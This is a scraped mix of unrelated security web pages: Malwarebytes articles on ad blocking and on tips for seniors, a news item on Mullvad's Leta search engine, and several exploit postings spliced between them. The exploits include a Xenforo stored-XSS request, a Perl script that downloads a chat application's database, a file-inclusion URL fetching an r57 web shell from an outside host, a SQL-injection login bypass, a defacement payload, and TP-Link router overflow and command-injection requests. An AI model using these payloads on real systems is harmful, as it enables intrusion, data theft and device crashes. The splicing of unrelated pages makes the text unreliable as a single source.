Categories: Personal
Tags: ad

Tags:  advert

Tags:  block

Tags:  blocking

Tags:  advertising

Tags:  blocker

Tags:  ad block

Tags:  tracking

Tags:  cookies

Tags:  analytics

Tags:  affiliate

Tags:  adware

Tags:  IoT

We take a look at why blocking adverts and tracking is one of the best things you can do to keep your devices healthy.



(Read more...)




The post Why blocking ads is good for your digital health appeared first on Malwarebytes Labs.

Online content is largely powered and paid for by advertising. Almost every site you visit, every forum you browse, and even the online stores you buy things from is an advert extravaganza, and they don’t just stop at showing cool offers for shirts at 50% off. The scaffolding the adverts sit on goes out of its way to track you, tie you to clicks, associations, and more. More adverts, tailored to your theoretical interests, then start to follow you around across other sites. Sometimes, it’s not very sophisticated: Ever searched for the one and only quarter height stepladder you’ll ever buy in your life? Congratulations, every advert is a stepladder.

Sadly, dozens of stepladder adverts are far from your only concern. We’re going to explain why running an ad blocker is a good thing for your digital health, and highlight all of the ways things can go wrong with ads enabled.

Adverts are the biggest of business, with billions of ad impressions per month. Individual companies can rack up billions of impressions just for their own ads, before you try and figure out overall tallies. Disney and Amazon had a total of 40bn impressions between them in the first quarter of 2020, and Google is pretty much powered by advertising:

> Google is an attention merchant that – in 2022 – generated over $224 billion (almost 80% of revenues) from ads (Google Search, YouTube Ads, and Network sites.

If you want some idea of the scale of advertising you’re subjected to on a daily basis, things are only moving up. Recent research by Lunio claims that, on average, people might have seen between 500 and 1,000 ads a day in the 1970s. By 2007, when adware vendors dropping ad-spewing installers was common and ad affiliate networks in meltdown was a daily occurrence, it was estimated at 5,000. By 2021, it was an average of 6,000 to 10,000 per day.

You have adverts and pop ups on your phone. You have advertising on your video game console dashboard. There’s another batch of stepladder adverts on your desktop. Your IoT home hub either plays an occasional ad or is plugged into some other service you use to buy things from.

Your television? Well, it might be one of the upcoming models where the TV is free in return for built in adverts constantly playing on a smaller screen. This is probably as good a place as any to remind you to always read the small print, however:

> today in privacy policies pic.twitter.com/83QI7l7iFu
> 
> — shoshana wodinsky (she/her) 📉 (@swodinsky) May 16, 2023

Some of the most common types of advertising you’ll encounter include:

*   **Pay per click (PPC)**. Advertisers pay publishers every time an advert is clicked.
*   **Affiliate marketing**. With this form of marketing, the creator of a product avoids taking up the marketing slack. Instead, it is essentially outsourced to others in the form of unique affiliate links or clickthroughs offered by apps or programs. If a sale is made, the affiliate earns commission money. There may be additional incentives on offer depending on the product.
*   **Mobile ads**. These are hugely popular in “free” games, where ads may be served by the app itself, or through a network being used by the app. The links may also lead to additional phone installations.

You’ll bump into others, but these are the three main areas of advertising which you’ll probably experience on a daily basis. They’re also a potential goldmine for scammers.

PPC is one of the oldest forms of advertising. Bogus ad clicking tools that artificially inflate revenue have been around forever, to various degrees of sophistication. Basic forms of malware are programmed to autoclick ads detected on websites. Other enterprising individuals concoct ways of manually clicking ads in ways which would not look suspicious to the advertisers.

Affiliate advertising is where much of the ad network chaos takes place. Back in the adware vendor days, rogue ad campaigns using malware, exploits, or fake products to make adware cash would be shut down after much outrage. The adware vendor would make a lot of noise about “rogue affiliates”, and claim it wasn’t their fault. Everything would go back to this same routine the day after and adware vendors would pretend they were somehow free of blame in all of this. Sometimes they would be sued into the ground and abandon the adware life, and other times the evidence of dubious antics were on display for all to see.

Even now, in the case of rogue advertising involving malware (malvertising) there’s often an affiliate component to the “your PC is now compromised” pipeline. You’ll encounter it in many ways:

*   Rogue sponsored adverts which sit above organic results in services like Google and Yahoo! search engines. These links may imitate brands or other services to entice you to click
*   Fake adverts embedded on websites. These also mimic popular brands to drive clicks
*   Compromised websites which may look like a familiar service, but every link offered up is potentially harmful to your PC

The ads in search engine results which look as though they resolve to legitimate sites like Amazon can also be harmful. This is as a result of advertisers being able to display a brand’s official URL within the ad snippet, even when an ad URL has nothing to do with the brand. From here you could be sent to a phishing page, a fake tech support site, or worse. Below you can see an example of a supposedly genuine sponsored ad which actually leads to a fake Amazon login.

Exploits are often a key component of malvertising attacks, and without the right protection on board you may realise too late that something has gone badly wrong.

On top of all this, we have the previously mentioned tracking going on under the hood. Web beacons are used to monitor activity on a website. Tracking cookies shared by multiple services constantly build up a picture of what you’ve done. So-called “shadow profiles” are used to track the activity of people who don’t even use a particular service.

Finally, we have the issue of speed. Lots of ads, tracking, and page elements being served up from different points of origin can all contribute to slowing down your browsing. You’ve almost certainly experienced the “thrill” of a website serving up the ads before the content at some point. This often happens because the ads are served from dedicated content delivery networks (CDNs). Their purpose is to get the ad in front of you as fast as possible, which can mean ads are the first thing you see. While your connection is (probably) a lot better now than it was five years ago, this can still cause issues in some cases...and who wants adverts to be the first thing they see on a page anyway?

As you may have gathered, it’s the marketing Wild West out there. It’s also worth noting that sites such as YouTube are now experimenting with detecting ad blockers, and disallowing users to view videos until their ad blocker is turned off.

**So what can we do about it?**

*   **Pick the right browser for your needs**. Increasingly, browsers offer more options to specify a level of tracking and advertising that you’re comfortable with. Back in 2020, Safari started blocking third party tracking cookies by default. Firefox has gone down the path of individual cookie jars, called “Total Cookie Protection”, which prevents tracking across websites. Elsewhere, Google is still delaying the sunsetting of third party tracking cookies.
*   **Extend your options**. On the subject of browsers, most will allow you to install extensions to increase your blocking capabilities. Some browsers like Opera include their own ad blocker by default which can be enabled in two clicks. You can also try Malwarebytes Browser Guard, which filters out ads and scams as well as blocking trackers that spy on you.
*   **Beware shady blockers**. You’ll sometimes see fake blockers riding on the coat tails of legitimate products. You may also run into websites or services which claim to dodge ad blocker detection, but serve up spam or surveys. Always do some research on anything you plan to install. Reviews and store rankings can help with this.
*   **Tackle the scripts**. It’s not “just” ads on the surface level. You also need to consider the tracking scripts, cookies, and everything else happening invisibly. Ensure your setup allows for taking care of third party ad tracking.
*   **Things will break**. A note of caution: Blocking scripts or other functionality can break some websites. You’ll need to customise your settings in these situations. Some products integrate ads into the actual structure of a product, so removing or blocking will break the product. Tablet games where you’re granted a new life by watching an ad, for example. There may not be much you can do when this happens. Use the product as is, or cut your losses and move on.

Malwarebytes protects against annoying ads and scams while blocking trackers that spy on you.

TRY NOW

Why blocking ads is good for your digital health

Xenforo version 2.2.13 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS# Date: 2023-06-24# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: https://x.com/admin.php?smilies# Version: 2.2.12 (REQUIRED)# Tested on: Windows/Linux# CVE : -----------------------------------------------------------------------------RequestsPOST /admin.php?smilie-categories/0/save HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/admin.php?smilies/X-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422Content-Length: 1038Origin: http://127.0.0.1Connection: closeCookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfToken"1687616851,83fd2350307156281e51b17e20fe575b-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="title"<img src=x onerror=alert(document.domain)>-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="display_order"1-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfRequestUri"/admin.php?smilies/-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfWithData"1-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfToken"1687616849,b74724a115448b864ba2db8f89f415f5-----------------------------333176689514537912041638543422Content-Disposition: form-data; name="_xfResponseType"json-----------------------------333176689514537912041638543422--Response: After it is created, an alert comes immediately.

Posted: June 26, 2023 by

Before we get into the tips: a caveat. We know many seniors who are digitally more up to date than people 20 years younger, but for those who aren't, this guide is for you.

If you’re offended by the word seniors in the title, feel free to replace it with “computer illiterate people.” And keep in mind that this piece was written by a 60-year old who happens to be the “computer guy” among his family and friends. 

With the world's increasing digitalization, even those that are not a big fan of computers are compelled to use them for various urgent reasons. Seniors in a digital world can be overwhelmed by all the new technology. And just when you think you’ve caught up, something new's been invented. 

In security terms, it can feel like there's a lot to do in order to keep your data and devices secure. Multiple passwords, reading through EULAs, website cookie notifications, and more. All of this can contribute to a serious case of security fatigue.

Many of today's most dangerous threats are delivered through social engineering, i.e., by tricking users into giving up their data, or downloading malware from an infected email attachment. Therefore, knowing more about what not to click on and what not to download can keep a good portion of threats out the door.

So, with that in mind, here are 9 basic security tips for seniors:

1.  **Do not click on links asking to fill out your personal information**. Banks and other financial institutions will not send emails with links, especially if those links are asking you to update your personal information. If a website promises you something in return for filling out your personal data, they are likely phishing. In return for your data, you will probably get lots more annoying emails, possibly an infection, and no gift.
2.  **Don't fall for too-good-to-be-true schemes**. If you get offered a service, product, or game for free, and it's unclear how the producers of the service or item are making money, don’t take it. Chances are, you will pay in other ways, such as sitting through overly-obnoxious ads, paying for in-game or in-product purchases, or being bombarded with marketing emails or otherwise awful user experiences.
3.  **Don't believe pop-ups and phone calls saying your computer is infected**. Unsolicited phone calls and websites that do this are known as tech support scams. The only programs that can tell if you have an infection are security platforms that either come built into your device or antimalware software that you've personally purchased or downloaded. Think about it: Microsoft does not monitor billions of computers just to call you as soon as it notices a virus on yours.
4.  **Don't download programs that call themselves system optimizers**. We consider these types of software, including driver updaters and registry cleaners, potentially unwanted programs. Why? They do nothing helpful—instead, they often take over browser home pages, redirect to strange landing pages, add unnecessary toolbars, and even serve up a bunch of popup ads. While not technically dangerous themselves, they're unneeded and could let other nasties in through the door.
5.  **Disable web push notif****ications**. These are almost never useful to the user, they can be easily spoofed, and they are regularly used for social engineering and obtrusive advertising purposes.
6.  **Keep your browser up-to-date**. Major browsers such as Firefox, Safari, and Chrome all have their own strengths and weaknesses, so it's a matter of personal preference which one you use. However, browsers regularly have vulnerabilities and any updates should be applied as soon as possible. Remember: You must restart your browser in order for updates to take effect.
7.  **Look for HTTPS and the padlock sign**. Just because there is a padlock next to the address bar doesn't mean the site is safe, but it does mean all the traffic between your computer and the website is encrypted. That means that if someone tried to snoop on what you were sending the website, they'd get nowhere because the data would be scrambled.
8.  **Use multi-factor authentication wherever you can.** You can set this up on most sites and usually involves you entering a code from either an app or a text message, after you've entered your password. Bonus points for healthcare or banking organizations with logins that use passkeys, a hardware key, or behavioral biometrics.
9.  **Use a password manager**. They help you create and remember safe passwords and they won't automatically put your passwords into fake sites, which helps you tell if something is a phishing site. This step might require some time and help from someone more technical, but it makes things much safer in the long run.

**We don’t just write about threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

**ABOUT THE AUTHOR**

Pieter Arntz  
Malware Intelligence Researcher

Was a Microsoft MVP in consumer security for 12 years running. Can speak four languages. Smells of rich mahogany and leather-bound books.

9 basic security tips for seniors

Advanced ASP Chat version 2.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Advanced ASP chat 2.0 Database Disclosure Exploit                                                                  |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://p30vel.ir                                                                                                   |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================  
poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# Advanced ASP chat 2.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : http://p30vel.ir

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('Advanced ASP chat 2.0 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Advanced ASP Chat 2.0 Database Disclosure

Adult Video Script version 3.0 suffers from local and remote file inclusion vulnerabilities.

    ====================================================================================================================================| # Title     : Adult Video Script 3.0 RFI /LFI Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Download  : https://update.avscms.com/files/avscms-8.2-full.zip                                                                || # Dork      :  Powered by AVSCMS                                                                                                 |====================================================================================================================================P0C :[+] Dorking İn Google Or Other Search Enggine.[+] R/L File Inclusion :    Line      : 20 = include_once ('./lang/'.$lang_include);    Function  : include_once    Variables :$lang_include    C:\web\www\upload\siteadmin\editor_files\image.php[+] http://127.0.0.1/www/lustubecom/siteadmin/editor_files/image.php?lang_include=http://www.dcvi.net/r57.txt?Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

Adult Video Script 3.0 File Inclusion

Adapt Inventory Management System version 1.0.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Adapt Inventory Management System 1.0.0 Auth By Pass Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/adapt-inventory-management-system/22838514?s_rank=7                                    |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload user & Pass : 1' or 1=1 -- -[+]  https://127.0.0.1/www/adaptinventory.com/demo/index.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Adapt Inventory Management System 1.0.0 SQL Injection

Active Newspaper version 2.0 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Active Newspaper v2.0 HTML inject Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://activeitzone.com/demo/newspaper_v2.0/                                                                      |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new member .[+] go to edit your profil https://127.0.0.1/activeitzonecom/demo/newspaper_v2.0/home/profile[+] edit your profil , put your code or use this code for test in First Name case or Last Name or ...etc :<marquee><font color=lime size=32>Hacked by indoushka</font></marquee></tr><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a></tr>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |        =======================================================================================================================================

Active Newspaper 2.0 HTML Injection

By Waqas
The Mullvad Leta search engine is accessible exclusively to users with a paid Mullvad VPN account.
This is a post from HackRead.com Read the original post: Mullvad VPN Introduces Mullvad Leta: A Privacy-Focused Search Engine

**One notable advantage of Mullvad Leta is the absence of third-party tracking links in search results, providing users with a clean and private browsing experience.**

Mullvad the company behind Mullvad VPN has unveiled Leta, a privacy-focused search engine designed to complement their renowned VPN services. Leta is accessible exclusively to users with a paid Mullvad VPN account and offers a range of features aimed at improving user privacy.

By default, the **recently launched Mullvad Browser** comes equipped with the DuckDuckGo search engine; however, users can now enjoy an alternative option with Mullvad Leta. To access Leta, users can set it as their default search engine within the Mullvad Browser or directly visit leta.mullvad.net.

Operating as a proxy, Mullvad Leta utilizes the Google Search API to cache search results. This caching system enables the sharing of cached results among all users, thereby reducing costs and enhancing privacy. Importantly, Leta is a user-supported service and does not rely on advertising or the sale of user data.

To simplify usage, Mullvad offers a browser extension that eliminates the need for repeated logins. Once users set their account number in the browser settings, they can seamlessly access Mullvad Leta. Search results are cached for a period of 30 days to protect against correlation attacks and manage costs effectively, ensuring a degree of privacy, albeit with slightly delayed results.

According to the company’s blog post published on June 20th, 2023, each Mullvad account allows users to perform up to 100 direct searches per day, alongside unlimited access to cached searches. Additional searches beyond the daily limit will prompt Mullvad Leta to execute a Google query on behalf of the user, sharing only the search term while safeguarding the rest of their data.

One notable advantage of Mullvad Leta is the absence of third-party tracking links in search results, providing users with a clean and private browsing experience. This eliminates the common intrusive tracking mechanisms found on other search engines and reinforces the commitment to user privacy.

Mullvad VPN is known for protecting its customers’ privacy. For instance, on April 18th, 2023, Mullvad VPN’s Gothenburg office was raided by Swedish police with a search warrant to confiscate computers containing the personal data of VPN service clients.

However, Mullvad employees informed the police that they do not store any data of their customers, and confiscating computers would be considered a violation of Swedish law. The police were left with no option but to leave the premises without any confiscated devices or user data.

**Takeaway**

With the introduction of Mullvad Leta, Mullvad continues to prioritize online privacy by offering a privacy-focused search engine. The integration of Leta with its renowned VPN services empowers users to enhance their online security and take control of their digital footprint.

By combining Mullvad’s expertise in VPN technology with a privacy-centric search engine, users can enjoy an elevated level of privacy and security during their online activities.

1.  Almost Every Major Free VPN is a Glorified Data Farm
2.  Israeli firm buys ExpressVPN raising privacy concerns
3.  Mozilla VPN – Firefox private network VPN is finally arriving
4.  ProtonVPN launches Chrome and Firefox browser extensions
5.  VPN Privacy: Shielding Your Online Activities from Prying Eyes

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Mullvad VPN Introduces Mullvad Leta: A Privacy-Focused Search Engine

TP-Link TL-WR940N V4 was discovered to contain a buffer overflow via the ipStart parameter at /userRpm/WanDynamicIpV6CfgRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**TP-Link TL-WR940N wireless router /userRpm/WanDynamicIpV6CfgRpm buffer write out-of-bounds vulnerability****1 Basic Information**

*   Vulnerability Type: Buffer write out-of-bounds
*   Vulnerability Description: A buffer write-out vulnerability exists in TP-Link TL-WR940N wireless router, firmware version V4. Its /userRpm/WanDynamicIpV6CfgRpm implementation has a security vulnerability in handling the ipStart GET key parameter, allowing remote attackers to submit special requests that can cause buffer out-of-bounds write errors, which may lead to memory-sensitive information leakage and denial of service.
*   Device model:
    *   TP-Link TL-WR940N V4

**2 Vulnerability Value**

*   Maturity of Public Information: None
    
*   Order of Public Vulnerability Analysis Report: None
    
*   Stable reproducibility: yes
    
*   Vulnerability Score (refer to CVSS)
    
    *   V2：8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C
    *   V3.1：9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
*   Exploit Conditions
    
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    
    *   Denial of Service
    *   Remote Code Execution(RCE)

**3 PoC**

The PoC of TP-Link TL-WR940N is as follows:

GET /RKIMKONAENVJOZYB/userRpm/WanDynamicIpV6CfgRpm.htm?ipv6Enable=on&wantype=2&ipType=2&mtu=1480&dnsType=0&ipAssignType=0&ipStart=1000aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ipEnd=2000&time=86400&ipPrefixType=0&staticPrefix=&staticPrefixLength=64&Save=Save HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/RKIMKONAENVJOZYB/userRpm/WanDynamicIpV6CfgRpm.htm
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

**4 Vulnerability Principle**

When the Web management component receives a GET request, its /userRpm/WanDynamicIpV6CfgRpm component implements a security vulnerability in processing the ipStart GET key parameter. The length of the parameter key of ipStart can be any length and it is put into the stack without any boundary check, resulting in a write out-of-bounds. An attacker can exploit this vulnerability to overwrite the return address, which may lead to the disclosure of memory-sensitive information and denial of service.

The firmware is simulated by means of simulation, the simulation process and interface are as follows:

After sending the PoC, the ipStart parameter value is too long, which leads to the write out of bounds, causing a fatal memory error, and a BadVA error, which leads to the service crash.

**5\. The basis for judging as a 0-day vulnerability**

Search the WanDynamicIpV6CfgRpm keyword in the NVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).

Search the WanDynamicIpV6CfgRpm keyword in the CNVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).

CVE-2023-36355: iotvul/tp-link/9/TP-Link TL-WR940N wireless router userRpmWanDynamicIpV6CfgRpm buffer write out-of-bounds vulnerability.md at main · a101e-IoTvul/iotvul

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR940N V2/V3 and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/QoSRuleListRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**TP-Link TL-WR940N/TL-WR841N/TL-WR941ND wireless router /userRpm/QoSRuleListRpm buffer read out-of-bounds vulnerability****1 Basic Information**

*   Vulnerability Type: Buffer read out-of-bounds
*   Vulnerability Description: A buffer overflow vulnerability exists in TP-Link TL-WR940N V4, TP-Link TL-WR841N V8/V10, TP-Link TL-WR940N V2/V3 and TP-Link TL-WR941ND V5/V6 wireless router. Its /userRpm/QoSRuleListRpm implementation has a security vulnerability in processing the protocol GET key parameters, allowing remote attackers to submit special requests through the vulnerability, causing buffer out-of-bounds read errors, which may lead to memory-sensitive information leakage and denial of service.
*   Device model:
    *   TP-Link TL-WR940N V4
    *   TP-Link TL-WR841N V8/V10
    *   TP-Link TL-WR940N V2/V3
    *   TP-Link TL-WR941ND V5/V6

**2 Vulnerability Value**

*   Maturity of Public Information: None
    
*   Order of Public Vulnerability Analysis Report: None
    
*   Stable reproducibility: yes
    
*   Vulnerability Score (refer to CVSS)
    
    *   V2：8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C
    *   V3.1：9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
*   Exploit Conditions
    
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    
    *   Denial of Service

**3 PoC**

The PoC of TP-Link TL-WR940N is as follows:

GET /IOCGBYQCLXJSWZMC/userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.4&end\_ip\_addr=192.168.0.6&start\_port=17&end\_port=20&protocolaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=0&min\_up\_band\_width=0&max\_up\_band\_width=0&min\_down\_band\_width=0&max\_down\_band\_width=0&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/IOCGBYQCLXJSWZMC/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V10 is as follows:

GET /CTVJVVOCIAAMCXNC/userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.4&end\_ip\_addr=192.168.0.6&start\_port=2&end\_port=4&$(\`reboot\`)=0&min\_up\_band\_width=0&max\_up\_band\_width=0&min\_down\_band\_width=0&max\_down\_band\_width=0&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/CTVJVVOCIAAMCXNC/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V2/TL-WR941ND V5 is as follows:

GET /MZKBGETBFITRVSAA/userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.3&end\_ip\_addr=192.168.0.34&start\_port=21&end\_port=24&protocol|reboot;=0&min\_up\_band\_width=12&max\_up\_band\_width=21&min\_down\_band\_width=12&max\_down\_band\_width=21&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/ZRCEHZIAURWJWDTC/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V3/TL-WR941ND V6 is as follows:

GET /IOCGBYQCKLVYFARA/userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.9&end\_ip\_addr=192.168.0.11&start\_port=12&end\_port=21&||reboot;=0&min\_up\_band\_width=10&max\_up\_band\_width=30&min\_down\_band\_width=10&max\_down\_band\_width=30&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
